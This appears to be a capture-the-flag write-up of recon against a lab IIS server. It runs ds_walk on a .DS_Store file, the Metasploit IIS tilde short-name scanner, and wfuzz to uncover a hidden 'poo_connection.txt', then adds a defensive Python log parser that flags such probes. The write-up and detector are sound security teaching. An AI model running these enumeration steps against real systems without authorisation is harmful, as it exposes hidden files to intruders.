If we discover a .DS_Store file, we can use ds_walk to parse it: .DS_Store records the names of the files and folders in its directory, so it can expose paths that are not otherwise linked or listed.
git clone https://github.com/Keramas/DS_Walk.git
python3 ds_walk.py -u http://10.13.38.11
IIS Tilde Enumeration
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.13.38.11
[*] Scanning in progress...
[*] No directories were found
[+] Found 1 files
[+] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_co*~1.txt*
[*] Auxiliary module execution completed
The 8.3 short name poo_co*~1.txt only reveals the first six characters of the filename, so we fuzz the rest. Pull every word beginning with "co" from the wordlist to use as candidates for the remainder:
grep '^co.*' directory-list-2.3-medium.txt > fuzz.txt
Using wfuzz with that list, showing only 200 responses:
┌──(root㉿kali)
└─# wfuzz -z file,fuzz.txt -t 50 --sc 200 -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt
Total requests: 2557

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000319:   200        6 L      7 W        142 Ch      "connection"
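What this short-name scan looks like from the server side, as an added example that is not part of the original write-up or of the scanner: a small parser over constructed IIS W3C log lines that flags 8.3 short-name probes (a tilde and digit next to a wildcard, as in `poo*~1*`) and counts them per client IP. The field layout is the IIS default; the log lines, IPs and threshold are made up for the example.

```python
import re
from collections import Counter

# Constructed sample IIS W3C log (not from the page). Default IIS field layout.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:01 10.13.38.11 GET /index.html - 80 - 10.10.14.5 Mozilla/5.0 - 200 0 0 12
2024-01-01 10:00:02 10.13.38.11 GET /dev/a*~1*/.aspx - 80 - 10.10.14.5 Mozilla/5.0 - 404 0 2 3
2024-01-01 10:00:02 10.13.38.11 GET /dev/p*~1*/.aspx - 80 - 10.10.14.5 Mozilla/5.0 - 404 0 2 3
2024-01-01 10:00:03 10.13.38.11 OPTIONS /dev/po*~1*/.aspx - 80 - 10.10.14.5 Mozilla/5.0 - 404 0 2 3
2024-01-01 10:00:03 10.13.38.11 GET /dev/poo*~1*/.aspx - 80 - 10.10.14.5 Mozilla/5.0 - 400 0 0 3
2024-01-01 10:00:04 10.13.38.11 GET /report~1.pdf - 80 - 10.10.14.9 Mozilla/5.0 - 200 0 0 20
"""

# An 8.3 short-name probe combines "~<digit>" with an IIS wildcard "*".
# A plain "~1" in a real filename (report~1.pdf) has no wildcard and is not flagged.
SHORTNAME_PROBE = re.compile(r"\*~\d|~\d\*")


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):  # skip malformed lines rather than guess
            continue
        yield dict(zip(fields, values))


def find_shortname_probes(text):
    """Return the log entries whose request path looks like a tilde probe."""
    return [e for e in parse_iis_log(text) if SHORTNAME_PROBE.search(e["cs-uri-stem"])]


def probing_clients(text, threshold=3):
    """Map client IP -> probe count, keeping only clients at or above the threshold."""
    counts = Counter(e["c-ip"] for e in find_shortname_probes(text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in probing_clients(SAMPLE_LOG).items():
        print(f"{ip}: {n} short-name probes")
```

The scanner infers which prefixes exist from the difference in status codes (404 versus 400 above), so a burst of wildcard-tilde requests with mixed 404/400 responses from one client is the signature to alert on.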